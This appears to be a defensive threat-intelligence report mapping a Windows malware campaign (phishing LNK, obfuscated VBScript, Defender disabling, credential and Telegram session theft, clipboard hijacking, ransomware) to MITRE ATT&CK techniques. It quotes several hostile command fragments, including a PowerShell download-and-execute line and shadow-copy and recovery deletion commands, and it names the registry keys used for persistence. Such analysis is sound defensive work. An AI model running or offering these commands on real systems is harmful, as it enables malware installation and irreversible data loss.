Inside a Multi-Stage Windows Malware Campaign

MITRE Techniques

• [T1566.001 ] Phishing: Attachment – Delivery of malicious LNK and decoy documents inside a compressed archive masquerading as business files. [‘The archive contains multiple decoy documents… The primary malicious file within the archive is the LNK shortcut Задание_для_бухгалтера_02отдела.txt.lnk’]
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – LNK launches PowerShell with execution policy bypass to download and execute the first-stage script. [‘-ExecutionPolicy Bypass -Command “irm … | iex”‘]
• [T1059.005 ] Command and Scripting Interpreter: VBScript – An obfuscated VBScript (SCRRC4ryuk.vbe) is used as the orchestrator and reconstructs payloads in memory. [‘SCRRC4ryuk.vbe serves as the central orchestrator… fragments are concatenated at runtime and passed through a custom decoding routine’]
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – The campaign systematically disables Microsoft Defender features via PowerShell and registry policy modifications. [‘disables Microsoft Defender real-time monitoring… writes multiple policy-controlled registry values under HKLMSOFTWAREPoliciesMicrosoftWindows Defender’]
• [T1562.004 ] Impair Defenses: Disable or Modify System Firewall / AV – Operational abuse of Defendnot to register a fake antivirus with Windows Security Center causing Defender to disable itself. [‘The loader injects the Defendnot DLL into the Microsoft-signed… Taskmgr.exe… registers a fake antivirus product with the Windows Security Center’]
• [T1027 ] Obfuscated / Encrypted Files or Information – Use of Script Encoder Plus, Base64, and RC4 to hide VBScript and payload logic, keeping final logic in-memory. [‘SCRRC4ryuk.vbe is written in a fully encoded form generated using Script Encoder Plus… Base64 decoding and then decrypts… with RC4’]
• [T1218 ] Signed Binary Proxy Execution – Injection of Defendnot into a Microsoft-signed trusted process (Taskmgr.exe) to execute within a trusted context. [‘injects the Defendnot DLL into the Microsoft-signed, trusted system process Taskmgr.exe by default’]
• [T1548.002 ] Abuse Elevation Control Mechanism: Bypass UAC – Repeated ShellExecute with the runas verb and monitoring for cmd.exe to obtain elevated privileges. [‘enters a persistent User Account Control (UAC) escalation loop… relaunches itself via ShellExecute with the runas verb… queries active processes… checking for the presence of cmd.exe’]
• [T1547.001 ] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via HKCUSoftwareMicrosoftWindowsCurrentVersionRun and copying payloads to the user Startup folder. [‘the file is copied to %PROGRAMDATA% and the user’s Startup folder, and persistence is established via a registry entry under HKCUSoftwareMicrosoftWindowsCurrentVersionRun’]
• [T1082 ] System Information Discovery – Collection of OS, hardware, domain, user, and network information for profiling and attacker situational awareness. [‘gather detailed host, hardware, user, network, and security-related information and transmit it to the attacker via the Telegram Bot API’]
• [T1057 ] Process Discovery – Enumeration of running processes via WMI to control execution flow and avoid duplicate components. [‘queries running processes via WMI to determine whether a process named install.exe is already active’]
• [T1113 ] Screen Capture – Periodic screenshot capture (up to ~30 images) by TelegramWorker.scr and exfiltration via Telegram. [‘it enters a capture loop with a limit of 30 iterations… each image is then transmitted to the attacker via the Telegram Bot API’]
• [T1056.001 ] Input Capture: Clipboard Data – Clipboard monitoring to capture seed phrases and intercept cryptocurrency addresses. [‘monitors clipboard contents in real time to intercept 12-, 18-, or 24-word recovery phrases’]
• [T1555 ] Credentials from Password Stores – Extraction and decryption of browser-saved credentials and session data using Local State and DPAPI. [‘decrypts by retrieving the browser master key from the Local State file and invoking Windows DPAPI to recover plaintext secrets’]
• [T1539 ] Steal Web Session Cookie – Theft of browser cookies and session tokens to enable account takeover. [‘extracts saved passwords, cookies, session tokens…’]
• [T1098 ] Account Manipulation – Telegram Desktop session hijacking via theft of tdata artifacts enabling takeover without credentials. [‘explicitly targets Telegram Desktop by stealing local session artifacts from the tdata directory’]
• [T1102.002 ] Web Service: External Web Services – Use of Telegram Bot API for C2 and data exfiltration. [‘sends an execution confirmation to the attacker using the Telegram Bot API’]
• [T1071.001 ] Application Layer Protocol: Web Protocols – HTTPS-based communications to Telegram and third-party file hosting for uploads and C2. [‘Exfiltration is primarily performed over HTTPS using Telegram Bot APIs… larger datasets may be uploaded to third-party file-hosting services’]
• [T1041 ] Exfiltration Over C2 Channel – Data and artifacts sent directly through the Telegram Bot API to the attacker. [‘Data sent directly through Telegram Bot APIs’]
• [T1567.002 ] Exfiltration Over Web Service – Use of third-party file hosting (e.g., GoFile) for transferring larger datasets. [‘larger datasets may be uploaded to third-party file-hosting services such as GoFile’]
• [T1486 ] Data Encrypted for Impact – Hakuna Matata–derived ransomware encrypts hundreds of file types and renames encrypted files with @NeverMind12F. [‘The WmiPrvSE.scr payload represents the ransomware stage… Encrypted files are renamed with the custom extension @NeverMind12F’]
• [T1490 ] Inhibit System Recovery – Disabling Windows Recovery Environment, deleting backup catalog, and removing VSS snapshots to prevent restoration. [‘disables the Windows Recovery Environment using reagentc /disable… deletes the Windows Backup catalog… vssadmin delete shadows /all /quiet’]
• [T1489 ] Service Stop – Termination of database, office, email, virtualization, and security-related processes before encryption. [‘terminates processes associated with databases, office software, email clients, virtualization platforms, and security tools before rescanning and encrypting remaining files’]
• [T1491.001 ] Defacement: Internal – Replacement of desktop wallpaper and embedding ransom messaging across UI components. [‘drops a ransom note named ЧИТАЙМЕНЯ.txt… replaces the desktop wallpaper with a ransom image generated on the fly’]
• [T1499 ] Endpoint Denial of Service – WinLocker enforces a full desktop lock and file association hijacking prevents application execution. [‘WinLocker creates a mutex… and enforces a full desktop lock… file association hijacking … opening these files launches a command shell that displays a message instructing the victim to contact the attacker via Telegram’]
• [T1565.001 ] Stored Data Manipulation – Clipboard hijacking to replace cryptocurrency addresses with attacker-controlled values. [‘actively monitors and hijacks clipboard contents, replacing cryptocurrency wallet addresses with attacker-controlled values’]